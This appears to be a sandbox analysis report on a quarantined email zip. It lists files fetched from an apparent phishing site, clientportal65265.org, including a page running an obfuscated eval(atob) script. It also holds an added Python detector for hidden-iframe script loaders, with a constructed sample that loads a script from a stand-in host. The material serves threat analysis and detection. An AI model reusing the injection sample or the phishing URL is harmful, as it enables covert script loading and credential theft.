                Preview:L..................F.@.. ...$+.,.....ye.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VBYl......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2691
                Entropy (8bit):4.002673014998024
                Encrypted:false
                SSDEEP:
                MD5:7E18C454C78D805DC7EE0E119467B352
                SHA1:B922134FC3E04D0B3387665DCC2F518F19BBCF42
                SHA-256:A1BA39DDBB8F2946E758144748D0B5754AC2BA29B2B25819D368CC0FC9D1444A
                SHA-512:54D31E5520F4700F4E523FA9E04BFE7BECD283995970067B62C87352CCB611AD5092A47FB5EFD653D84AB8382168C83C20305ECAD11C100DD25CD26521CA8537
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 14:59:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2679
                Entropy (8bit):3.98946769007113
                Encrypted:false
                SSDEEP:
                MD5:DCDF543CC4D4EDCC3D76B895C3834DF7
                SHA1:95B48A5474A0DC575575888B99705472859DDD70
                SHA-256:5779E0305629A23CE1DF917C91245851A1E771157279F3EA8678827D00EC0D65
                SHA-512:33B8A1977140A7D464182F3AD09C282CDDC97795E19AB8E82C8241CBEF8828EFC0117FC11F406034B992BA7C480A1B9A15581345538E713538576FB4DF41434D
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....M^.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VBYl......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 14:59:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2681
                Entropy (8bit):3.98691414611879
                Encrypted:false
                SSDEEP:
                MD5:E3FD71C2C80343AD6ECE01FCF757CB11
                SHA1:D3DFBAC427CC2334340852134B7FE297441CE869
                SHA-256:D7B24CC00FB24CF62E58A1D51873D7EC1E7390D49C272E2A9B2D71E6B01C6064
                SHA-512:4C558C429FBEC5ED7E3F567D993486B8EF1EB0475637DE9220C5C55F0832FF17418FEDE67D3DBB845E9A1C79C654630625275D945ABE64E7B9B97370D74BC849
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....x.S.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VBYl......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with very long lines (1195), with no line terminators
                Category:downloaded
                Size (bytes):1195
                Entropy (8bit):5.205384363607051
                Encrypted:false
                SSDEEP:
                MD5:F1673318C9298FE4798BB311A511E731
                SHA1:201399F82A7AE4D8BB415BB2138B178915C12000
                SHA-256:32BEAD40A10753F7725BCAE01E2FED48D9DB2E3253BF30D5E263E92A066C040D
                SHA-512:C921DD85D5C030F48489300E890DC003874E75A096861A5BC7409833AE067BA88CE197B099A1BCBAE302EDF275E558972943D9C18B7171B30F3E442313079D9D
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/salimre/agg.php
                Preview:<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8cc5e78fd8c9c44f',t:'MTcyNzg4NDgxOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);el
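The script in the preview above is what fires the "HTML page contains hidden javascript code" signature: it appends a 1x1, visibility:hidden iframe and injects a script into it. The injected script sets window.__CF$cv$params and loads /cdn-cgi/challenge-platform/scripts/jsd/main.js, which is Cloudflare's bot-management loader served on any Cloudflare-fronted page, including this 404. The example below, added here and not part of the Joe Sandbox report, shows how to detect the hidden-loader pattern and separate the Cloudflare case from an unknown injector. SAMPLE_HTML is the preview quoted above (truncated where the report truncates it); CONSTRUCTED_INJECTION, the pattern lists and the verdict labels are this example's own.

```python
"""Detect a hidden-iframe script loader in HTML and tell Cloudflare's
challenge-platform loader apart from an unknown injector.

Added example; not part of the Joe Sandbox report. SAMPLE_HTML is the agg.php
response preview quoted in the report (cut off where the preview is cut off).
CONSTRUCTED_INJECTION is a made-up sample; the regex lists are this example's.
"""
import re

SAMPLE_HTML = r"""<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8cc5e78fd8c9c44f',t:'MTcyNzg4NDgxOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);el"""

# Constructed sample: same hidden-iframe trick, but loading an arbitrary host.
CONSTRUCTED_INJECTION = (
    "<html><body>hello<script>var f=document.createElement('iframe');"
    "f.width=1;f.height=1;f.style.visibility='hidden';document.body.appendChild(f);"
    "var s=f.contentWindow.document.createElement('script');"
    "s.src='https://cdn.example.invalid/l.js';f.contentWindow.document.head.appendChild(s);"
    "</script></body></html>"
)

# All four must appear in one script body: an iframe created, sized 1x1, hidden.
HIDDEN_IFRAME = [
    r"createElement\(['\"]iframe['\"]\)",
    r"\.height\s*=\s*1\b",
    r"\.width\s*=\s*1\b",
    r"visibility\s*=\s*['\"]hidden['\"]",
]
SCRIPT_CREATE = r"createElement\(['\"]script['\"]\)"
SCRIPT_SRC = r"\.src\s*=\s*['\"]([^'\"]+)['\"]"
# Markers of Cloudflare's challenge-platform (bot management) loader.
CF_MARKERS = [r"__CF\$cv\$params", r"/cdn-cgi/challenge-platform/"]


def script_bodies(html):
    """JS bodies of all <script> elements, plus an unterminated trailing one
    (sandbox previews are routinely cut off mid-script, as above)."""
    bodies = re.findall(r"<script\b[^>]*>(.*?)</script>", html, flags=re.S | re.I)
    opens = list(re.finditer(r"<script\b[^>]*>", html, flags=re.I))
    if len(opens) > len(bodies):
        bodies.append(html[opens[-1].end():])
    return bodies


def analyse(html):
    """Return the matched features and a verdict label for one HTML body."""
    found = {"hidden_iframe": False, "script_injection": False,
             "injected_srcs": [], "cloudflare_challenge": False}
    for js in script_bodies(html):
        if all(re.search(p, js) for p in HIDDEN_IFRAME):
            found["hidden_iframe"] = True
        if re.search(SCRIPT_CREATE, js):
            found["script_injection"] = True
            found["injected_srcs"] += re.findall(SCRIPT_SRC, js)
        if any(re.search(p, js) for p in CF_MARKERS):
            found["cloudflare_challenge"] = True
    if found["hidden_iframe"] and found["script_injection"]:
        found["verdict"] = ("cloudflare-bot-management" if found["cloudflare_challenge"]
                            else "unknown-hidden-loader")
    else:
        found["verdict"] = "no-hidden-loader"
    return found


if __name__ == "__main__":
    for label, doc in (("agg.php preview", SAMPLE_HTML),
                       ("constructed", CONSTRUCTED_INJECTION)):
        r = analyse(doc)
        print(label, r["verdict"], r["injected_srcs"])
```

On the agg.php preview the verdict is cloudflare-bot-management with the single injected source /cdn-cgi/challenge-platform/scripts/jsd/main.js, so the "hidden javascript" hit is CDN behaviour, not the phishing page's own payload; the constructed sample, identical in shape but loading from a non-Cloudflare host, comes back as unknown-hidden-loader and would merit a look at the loaded script. Treat the Cloudflare markers as a demotion of priority, not as proof of benignity: the page behind the challenge is still the one chosen by whoever registered clientportal65265.org.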
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):61
                Entropy (8bit):3.990210155325004
                Encrypted:false
                SSDEEP:
                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                Malicious:false
                Reputation:unknown
                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 9 x 100, 8-bit/color RGB, non-interlaced
                Category:downloaded
                Size (bytes):61
                Entropy (8bit):4.068159130770306
                Encrypted:false
                SSDEEP:
                MD5:16042314C19B6E7D2E5D8F1362B6DF15
                SHA1:84F3F8196A5064A78403D977D71854E5E7E5C5C3
                SHA-256:00445F0D9637937AA5BA02E0185ABB0E2B41024C8CA37264C898DFBEDF94CC72
                SHA-512:55C6F5DE3548D6FD174E008941A6B7BDE075E90B4CB3A7DC78781D44A46C274DB05545A92E83CC78BA3BF0CA7D1209264476C499A0EB7BB46FF08E91319EDDAD
                Malicious:false
                Reputation:unknown
                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cc5e6995ff01996/1727884780351/veSsKOP5pCdASrt
                Preview:.PNG........IHDR.......d............IDAT.....$.....IEND.B`.
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                Category:downloaded
                Size (bytes):452
                Entropy (8bit):7.0936408308765495
                Encrypted:false
                SSDEEP:
                MD5:C33DE66281E933259772399D10A6AFE8
                SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/cdn-cgi/images/icon-exclamation.png?1376755637
                Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with CRLF line terminators
                Category:downloaded
                Size (bytes):564
                Entropy (8bit):4.702540958385578
                Encrypted:false
                SSDEEP:
                MD5:4DEC45889E09EC3CEB63FD65825D0F11
                SHA1:D80EAF048573A410CB6C49EBB859280D04B6113C
                SHA-256:CAB538FD1647961EB35348C1BD84E1FDE389AD89672587D2FE3C007A0BC9E67F
                SHA-512:6BA9CC945B78B1C1F7B80A2BC3C0D48D3E1C5FC2A481FADA4E9018622664FB7423623B3563A6236BF105621E4A907A9957AF421EF67783F3DC1194B9BC308C7B
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/favicon.ico
                Preview:<html>..<head><title>403 Forbidden</title></head>..<body bgcolor="white">..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (24050)
                Category:downloaded
                Size (bytes):24051
                Entropy (8bit):4.941039417164537
                Encrypted:false
                SSDEEP:
                MD5:5E8C69A459A691B5D1B9BE442332C87D
                SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/cdn-cgi/styles/cf.errors.css
                Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (47261)
                Category:downloaded
                Size (bytes):47262
                Entropy (8bit):5.3974731018213795
                Encrypted:false
                SSDEEP:
                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                Malicious:false
                Reputation:unknown
                URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit
                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with very long lines (5949)
                Category:downloaded
                Size (bytes):7383
                Entropy (8bit):5.696713832821179
                Encrypted:false
                SSDEEP:
                MD5:7BED9202592729236800F9789A71EC9F
                SHA1:76F8A3D9B39D86FF4952BAB58959B41E77087BB3
                SHA-256:CEB8D9F64B67C1A510D491269DBB24B713BCE6A05E21125F666089822D2899E2
                SHA-512:17E600E37F1118E6E65D68F10C87C8EECEE6C4E343156C271C47E20E56A67902488AFADDC78208CC75778CA3921F13B32C085F32BA80274AEF5926B942529318
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/salimre/agg.php
                Preview:<!DOCTYPE html>.<html>.<head>.<meta charset="utf-8" />.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />.<meta name="robots" content="noindex, nofollow" />. Start: Ad code and script tags for header of page -->. End: Ad code and script tags for header of page -->.<script type="text/javascript" charset="utf-8" data-cfasync="false">eval(decodeURIComponent(escape(window.atob('KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZ
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (8045), with no line terminators
                Category:downloaded
                Size (bytes):8045
                Entropy (8bit):5.7904643014786386
                Encrypted:false
                SSDEEP:
                MD5:70E0755FA3824FC862C68646859B67B6
                SHA1:B428C2DDF9F91E41AF661401607A88485DF117B7
                SHA-256:78D81172DD8824025018B9AFD2FE355EB7D4382F06A25D193D0D705D2C5A8F18
                SHA-512:A771A7F924C2B1929215DBD863EA12883C84589353792252E590F91B07D968E6D4ECFE4E6612DE6F61B8960AD6D5CD34737EC761C25508B4793EF7060867DCF5
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,f,g,h,m,n,x,y){V=b,function(c,d,U,B,C){for(U=b,B=c();!![];)try{if(C=parseInt(U(293))/1*(parseInt(U(337))/2)+-parseInt(U(362))/3*(parseInt(U(286))/4)+-parseInt(U(310))/5*(-parseInt(U(313))/6)+parseInt(U(354))/7+parseInt(U(322))/8*(-parseInt(U(343))/9)+parseInt(U(308))/10+-parseInt(U(304))/11,C===d)break;else B.push(B.shift())}catch(D){B.push(B.shift())}}(a,814262),f=this||self,g=f[V(292)],h=function(W,d,B,C){return W=V,d=String[W(314)],B={'h':function(D){return null==D?'':B.g(D,6,function(E,X){return X=b,X(349)[X(307)](E)})},'g':function(D,E,F,Y,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(Y=W,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[Y(271)];Q+=1)if(R=D[Y(307)](Q),Object[Y(258)][Y(340)][Y(347)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[Y(258)][Y(340)][Y(347)](H,S))J=S;else{if(Object[Y(258)][Y(340)][Y(347)](I,J)){if(256>J[Y(321)](0)){for(G=0;G<M;O<<=1,P==E-1?(P=0,N[Y(365)](F(O)),O=0):P++,G++);for(T=J[Y(321)](0),G=0;8>G;O=T&1|O<<1,P==E
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (8052), with no line terminators
                Category:dropped
                Size (bytes):8052
                Entropy (8bit):5.75112694648969
                Encrypted:false
                SSDEEP:
                MD5:305844A765728285B260546E16EAF202
                SHA1:21B604B122BFB86D387ECE36BCDB6D910AD08974
                SHA-256:FAC005CEF602FD4B9D36380366C91F2257B749FEF5CEAF2B247B4945776253E0
                SHA-512:D1C697EA06981C53602DCA96B5EBEFA28E00CA37B7E18F61C2E77179ACB5054B70B2C0583DA4D7DC0550B3814B8D9FB8E637F045345BD925A83084977F51CF04
                Malicious:false
                Reputation:unknown
                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,i,j,n,o,A){V=b,function(d,e,U,f,C){for(U=b,f=d();!![];)try{if(C=-parseInt(U(330))/1*(-parseInt(U(348))/2)+parseInt(U(308))/3*(-parseInt(U(364))/4)+parseInt(U(347))/5+parseInt(U(329))/6*(-parseInt(U(382))/7)+parseInt(U(311))/8+-parseInt(U(304))/9*(-parseInt(U(326))/10)+parseInt(U(303))/11,e===C)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,116560),g=this||self,h=g[V(346)],i={},i[V(380)]='o',i[V(343)]='s',i[V(370)]='u',i[V(388)]='z',i[V(306)]='n',i[V(317)]='I',j=i,g[V(355)]=function(C,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D||void 0===D)return F;for(H=m(D),C[a0(298)][a0(310)]&&(H=H[a0(359)](C[a0(298)][a0(310)](D))),H=C[a0(338)][a0(350)]&&C[a0(295)]?C[a0(338)][a0(350)](new C[(a0(295))](H)):function(N,a1,O){for(a1=a0,N[a1(293)](),O=0;O<N[a1(362)];N[O]===N[O+1]?N[a1(369)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(377)][a0(325)](I),J=0;J<H[a0(362)];K=H[J],L=l(C,D,K),I(L)?(M=L==='s'&&!C[a0(305)](D[K]),a0(282)===E+K?G(E+K
                File type:Zip archive data, at least v4.5 to extract, compression method=deflate
                Entropy (8bit):7.981944910097865
                TrID:
                • ZIP compressed archive (8000/1) 100.00%
                File name:Quarantined Messages(9).zip
                File size:13'903 bytes
                MD5:d0b2e490900517e47d99b92fadd6782f
                SHA1:ef7b644648092578a3890c1f945ed043d22e61f3
                SHA256:a84ad5387dd4803a60f346fc190ee587fe4da91c90df0f70f8e2ae83a51b1242
                SHA512:b0d50ddaff6e1718c91ec5ad5aa745752b361de28d046e85cfdc6e216c3904713a584089d54691833d49c2d3eb96b845b237f744ea5bb2414b9f867f00d38ffa
                SSDEEP:384:rCpDRWcJfJLItQ//MSx1mdg4gaGYAOq0PstRS2SkFWzy2BTkG:eFVLItOlx1GgaOOzPsvnFA
                TLSH:C452D1DEF1ED6D02D8BD29B91DD43C27A7EE14C586816C5154E0B0CB1A9005673FBB0B
                File Content Preview:PK..-..... .BYZ...........M...c2a65c0a-d2ae-4eac-21cd-08dce2de9da7/ef3049e0-344c-9ead-ea49-53e550940a43.eml.............5......@...V..xc`k$...E..k.]_...k.e".@.....kh..E...,..R..K-._...N...o..$..jZ.b.E[..M...zxR...... M\..(/.52.2...rH..u]..r....n."&......u
                Icon Hash:1c1c1e4e4ececedc